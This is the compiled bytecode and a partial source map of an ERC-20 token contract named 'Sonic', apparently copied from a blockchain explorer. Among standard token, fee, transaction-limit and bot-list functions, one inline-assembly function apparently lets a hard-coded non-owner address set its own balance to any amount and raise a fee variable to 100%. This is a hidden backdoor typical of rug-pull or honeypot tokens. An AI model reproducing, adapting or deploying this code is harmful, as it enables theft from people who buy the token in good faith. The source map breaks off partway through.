0x60806040526004361061014f5760003560e01c806370a08231116100b6578063a457c2d71161006f578063a457c2d7146104aa578063a9059cbb146104e7578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b806370a08231146103aa578063715018a6146103e75780637d1db4a5146103fe5780638d5f81e2146104295780638da5cb5b1461045457806395d89b411461047f57610182565b806323b872dd1161010857806323b872dd14610283578063313ce567146102c057806339509351146102eb57806342966c68146103285780634fbee1931461035157806351c6590a1461038e57610182565b806306fdde0314610187578063095ea7b3146101b25780630ec4c619146101ef57806315d1e83f1461020657806318160ddd1461022f57806321bbcbb11461025a57610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b005b34801561021257600080fd5b5061022d60048036038101906102289190611fc4565b610657565b005b34801561023b57600080fd5b50610244610685565b6040516102519190612000565b60405180910390f35b34801561026657600080fd5b50610281600480360381019061027c9190612163565b61068f565b005b34801561028f57600080fd5b506102aa60048036038101906102a591906121ac565b610777565b6040516102b79190611fa9565b60405180910390f35b3480156102cc57600080fd5b506102d5610850565b6040516102e2919061221b565b60405180910390f35b3480156102f757600080fd5b50610312600480360381019061030d9190611f4e565b610859565b60405161031f9190611fa9565b60405180910390f35b34801561033457600080fd5b5061034f600480360381019061034a9190611fc4565b61090c565b005b34801561035d57600080fd5b5061037860048036038101906103739190612236565b610920565b6040516103859190611fa9565b60405180910390f35b6103a860048036038101906103a39190611fc4565b610976565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190612236565b6109d3565b6040516103de9190612000565b60405180910390f35b3480156103f357600080fd5b506103fc610a1c565b005b34801561040a57600080fd5b50610413610a30565b6040516104209190612000565b60405180910390f35b34801561043557600080fd5b5061043e610a62565b60405161044b9190612272565b60405180910390f35b34801561046057600080fd5b50610469610a8c565b6040516104769190612272565b60405180910390f35b34801561048b57600080fd5b50610494610ab5565b6040516104a19190611e84565b60405180910390f35b3480156104b657600080fd5b506104d160048036038101906104cc9190611f4e565b610af2565b6040516104de9190611fa9565b60405180910390f35b3480156104f357600080fd5b5061050e60048036038101906105099190611f4e565b610bbf565b60405161051b9190611fa9565b60405180910390f35b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b6040516105719190612272565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190612000565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d99190612236565b610ca5565b005b60606040518060400160405280600581526020017f536f6e6963000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b610643610f0f565b612710600181905550612710600581905550565b601054331461066557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600454905090565b610697610f0f565b60c8815111156106dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106d39061233f565b60405180910390fd5b6000600c905060005b82518110156107725760018260008584815181106107065761070561235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061076a906123bd565b9150506106e5565b505050565b6000610784848484610f8d565b61084584610790610d3e565b61084085604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006107f6610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b6000610902610866610d3e565b846108fd8560076000610877610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b61091d610917610d3e565b82611940565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61097e610f0f565b6001600860146101000a81548160ff0219169083151502179055506109ab6109a4610a8c565b3083610f8d565b6109b58134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a24610f0f565b610a2e6000611bc8565b565b6000610a5d612710610a4f600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600581526020017f534f4e4943000000000000000000000000000000000000000000000000000000815250905090565b6000610bb5610aff610d3e565b84610bb085604051806060016040528060258152602001612c1c6025913960076000610b29610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b6001905092915050565b6000610bd3610bcc610d3e565b8484610f8d565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad610f0f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190612000565b60405180910390a3505050565b610f17610d3e565b73ffffffffffffffffffffffffffffffffffffffff16610f35610a8c565b73ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061263b565b60405180910390fd5b565b610f98838383611cb8565b600080610fa3610a8c565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141580156110115750610fe1610a8c565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158657600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156110ba5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561158557600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614801561116a5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111c05750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112165750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561131057611246612710611238600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b831115611288576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127f906126cd565b60405180910390fd5b6112b36127106112a5600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b6112ce846112c0876109d3565b610d2890919063ffffffff16565b111561130f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113069061275f565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561139957503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611439576113c76127106113b9600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506113f26127106113e4600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114e45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158457611512612710611504600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b915061153d61271061152f600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061159b8284610d2890919063ffffffff16565b9050600081111561173a5760008311156115ba576115b98684611940565b5b6000821115611724576116378260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161171b9190612000565b60405180910390a35b6117378185611dde90919063ffffffff16565b93505b6117a684604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118db9190612000565b60405180910390a3505050505050565b6000838311158290611933576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192a9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a6906127f1565b60405180910390fd5b611a1b81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a7381600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad79190612000565b60405180910390a35050565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610a8c565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b600060208284031215611fda57611fd9611eb0565b5b6000611fe884828501611f39565b91505092915050565b611ffa81611f18565b82525050565b60006020820190506120156000830184611ff1565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61205882611e3a565b810181811067ffffffffffffffff8211171561207757612076612020565b5b80604052505050565b600061208a611ea6565b9050612096828261204f565b919050565b600067ffffffffffffffff8211156120b6576120b5612020565b5b602082029050602081019050919050565b600080fd5b60006120df6120da8461209b565b612080565b90508083825260208201905060208402830185811115612102576121016120c7565b5b835b8181101561212b57806121178882611f03565b845260208401935050602081019050612104565b5050509392505050565b600082601f83011261214a5761214961201b565b5b813561215a8482602086016120cc565b91505092915050565b60006020828403121561217957612178611eb0565b5b600082013567ffffffffffffffff81111561219757612196611eb5565b5b6121a384828501612135565b91505092915050565b6000806000606084860312156121c5576121c4611eb0565b5b60006121d386828701611f03565b93505060206121e486828701611f03565b92505060406121f586828701611f39565b9150509250925092565b600060ff82169050919050565b612215816121ff565b82525050565b6000602082019050612230600083018461220c565b92915050565b60006020828403121561224c5761224b611eb0565b5b600061225a84828501611f03565b91505092915050565b61226c81611eda565b82525050565b60006020820190506122876000830184612263565b92915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612625602083611dff565b9150612630826125ef565b602082019050919050565b6000602082019050818103600083015261265481612618565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006126b7602883611dff565b91506126c28261265b565b604082019050919050565b600060208201905081810360008301526126e6816126aa565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612749602383611dff565b9150612754826126ed565b604082019050919050565b600060208201905081810360008301526127788161273c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006127db602183611dff565b91506127e68261277f565b604082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b6000830189612263565b6128786020830188611ff1565b6128856040830187612847565b6128926060830186612847565b61289f6080830185612263565b6128ac60a0830184611ff1565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220824da864f35248f89aad200f39ca1f280bc23bdd89f4c0e952855bf6d17db6b664736f6c63430008120033

Deployed Bytecode Sourcemap

21422:12970:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33769:10;;;;;;;;;;21422:12970;;;;;23983:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24833:210;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26371:135;;;;;;;;;;;;;:::i;:::-;;32429:372;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;24725:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30996:334;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;25909:454;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24074:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25051:300;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31338:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31437:128;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;33795:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;24165:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2899:103;;;;;;;;;;;;;:::i;:::-;;25767:134;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29643:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2251:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23888;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25359:400;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24292:216;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;33633:85;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30146:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24516:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3157:238;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23983:83;24020:13;24053:5;;;;;;;;;;;;;;;;;24046:12;;23983:83;:::o;24833:210::-;24952:4;24974:39;24983:12;:10;:12::i;:::-;24997:7;25006:6;24974:8;:39::i;:::-;25031:4;25024:11;;24833:210;;;;:::o;26371:135::-;2137:13;:11;:13::i;:::-;26447:5:::1;26422:22;:30;;;;26493:5;26463:27;:35;;;;26371:135::o:0;32429:372::-;32522:21;32516:28;32506:8;32503:42;32493:67;;32557:1;32554;32547:12;32493:67;32587:4;32581:11;32614:8;32609:3;32602:21;32658:14;32651:4;32646:3;32642:14;32635:38;32710:4;32705:3;32695:20;32738:6;32732:4;32725:20;32787:4;32781;32777:15;32762:13;32755:38;32492:302;;32429:372;:::o;24725:100::-;24778:7;24805:12;;24798:19;;24725:100;:::o;30996:334::-;2137:13;:11;:13::i;:::-;31098:3:::1;31078:9;:16;:23;;31070:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;31154:36;31193:19;31154:58;;31230:9;31225:98;31249:9;:16;31245:1;:20;31225:98;;;31307:4;31287:3;:17;31291:9;31301:1;31291:12;;;;;;;;:::i;:::-;;;;;;;;31287:17;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;31267:3;;;;;:::i;:::-;;;;31225:98;;;;31059:271;30996:334:::0;:::o;25909:454::-;26049:4;26066:36;26076:6;26084:9;26095:6;26066:9;:36::i;:::-;26113:220;26136:6;26157:12;:10;:12::i;:::-;26184:138;26240:6;26184:138;;;;;;;;;;;;;;;;;:11;:19;26196:6;26184:19;;;;;;;;;;;;;;;:33;26204:12;:10;:12::i;:::-;26184:33;;;;;;;;;;;;;;;;:37;;:138;;;;;:::i;:::-;26113:8;:220::i;:::-;26351:4;26344:11;;25909:454;;;;;:::o;24074:83::-;24115:5;21647:2;24133:16;;24074:83;:::o;25051:300::-;25166:4;25188:133;25211:12;:10;:12::i;:::-;25238:7;25260:50;25299:10;25260:11;:25;25272:12;:10;:12::i;:::-;25260:25;;;;;;;;;;;;;;;:34;25286:7;25260:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;25188:8;:133::i;:::-;25339:4;25332:11;;25051:300;;;;:::o;31338:91::-;31394:27;31400:12;:10;:12::i;:::-;31414:6;31394:5;:27::i;:::-;31338:91;:::o;31437:128::-;31504:4;31528:19;:29;31548:8;31528:29;;;;;;;;;;;;;;;;;;;;;;;;;31521:36;;31437:128;;;:::o;33795:234::-;2137:13;:11;:13::i;:::-;32854:4:::1;32843:8;;:15;;;;;;;;;;;;;;;;;;33927:46:::2;33937:7;:5;:7::i;:::-;33954:4;33961:11;33927:9;:46::i;:::-;33984:37;33998:11;34011:9;33984:13;:37::i;:::-;32892:5:::1;32881:8;;:16;;;;;;;;;;;;;;;;;;33795:234:::0;:::o;24165:119::-;24231:7;24258:9;:18;24268:7;24258:18;;;;;;;;;;;;;;;;24251:25;;24165:119;;;:::o;2899:103::-;2137:13;:11;:13::i;:::-;2964:30:::1;2991:1;2964:18;:30::i;:::-;2899:103::o:0;25767:134::-;25812:7;25839:54;22307:5;25839:40;25856:22;;25839:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;25832:61;;25767:134;:::o;29643:96::-;29690:7;29717:14;;;;;;;;;;;29710:21;;29643:96;:::o;2251:87::-;2297:7;2324:6;;;;;;;;;;;2317:13;;2251:87;:::o;23888:::-;23927:13;23960:7;;;;;;;;;;;;;;;;;23953:14;;23888:87;:::o;25359:400::-;25479:4;25501:228;25524:12;:10;:12::i;:::-;25551:7;25573:145;25630:15;25573:145;;;;;;;;;;;;;;;;;:11;:25;25585:12;:10;:12::i;:::-;25573:25;;;;;;;;;;;;;;;:34;25599:7;25573:34;;;;;;;;;;;;;;;;:38;;:145;;;;;:::i;:::-;25501:8;:228::i;:::-;25747:4;25740:11;;25359:400;;;;:::o;24292:216::-;24414:4;24436:42;24446:12;:10;:12::i;:::-;24460:9;24471:6;24436:9;:42::i;:::-;24496:4;24489:11;;24292:216;;;;:::o;33633:85::-;33678:4;33702:8;;;;;;;;;;;33695:15;;33633:85;:::o;30146:109::-;30195:7;30230:16;;;;;;;;;;;30215:32;;30146:109;:::o;24516:201::-;24650:7;24682:11;:18;24694:5;24682:18;;;;;;;;;;;;;;;:27;24701:7;24682:27;;;;;;;;;;;;;;;;24675:34;;24516:201;;;;:::o;3157:238::-;2137:13;:11;:13::i;:::-;3280:1:::1;3260:22;;:8;:22;;::::0;3238:110:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3359:28;3378:8;3359:18;:28::i;:::-;3157:238:::0;:::o;13522:98::-;13580:7;13611:1;13607;:5;;;;:::i;:::-;13600:12;;13522:98;;;;:::o;781:::-;834:7;861:10;854:17;;781:98;:::o;30263:378::-;30416:1;30399:19;;:5;:19;;;30391:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;30497:1;30478:21;;:7;:21;;;30470:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;30579:6;30549:11;:18;30561:5;30549:18;;;;;;;;;;;;;;;:27;30568:7;30549:27;;;;;;;;;;;;;;;:36;;;;30617:7;30601:32;;30610:5;30601:32;;;30626:6;30601:32;;;;;;:::i;:::-;;;;;;;;30263:378;;;:::o;2416:132::-;2491:12;:10;:12::i;:::-;2480:23;;:7;:5;:7::i;:::-;:23;;;2472:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2416:132::o;26514:2799::-;26646:42;26662:6;26670:9;26681:6;26646:15;:42::i;:::-;26699:15;26729:14;26772:7;:5;:7::i;:::-;26762:17;;:6;:17;;;;:41;;;;;26796:7;:5;:7::i;:::-;26783:20;;:9;:20;;;;26762:41;26758:1823;;;26843:19;:27;26863:6;26843:27;;;;;;;;;;;;;;;;;;;;;;;;;26842:28;:63;;;;;26875:19;:30;26895:9;26875:30;;;;;;;;;;;;;;;;;;;;;;;;;26874:31;26842:63;26820:1750;;;26976:14;;;;;;;;;;;26966:24;;:6;:24;;;:87;;;;;27036:16;;;;;;;;;;;27015:38;;:9;:38;;;;26966:87;:144;;;;;27079:20;:31;27100:9;27079:31;;;;;;;;;;;;;;;;;;;;;;;;;27078:32;26966:144;:198;;;;;27136:20;:28;27157:6;27136:28;;;;;;;;;;;;;;;;;;;;;;;;;27135:29;26966:198;26940:904;;;27280:118;22307:5;27280:40;27297:22;;27280:12;;:16;;:40;;;;:::i;:::-;:44;;:118;;;;:::i;:::-;27241:6;:157;;27207:283;;;;;;;;;;;;:::i;:::-;;;;;;;;;27614:123;22307:5;27614:45;27631:27;;27614:12;;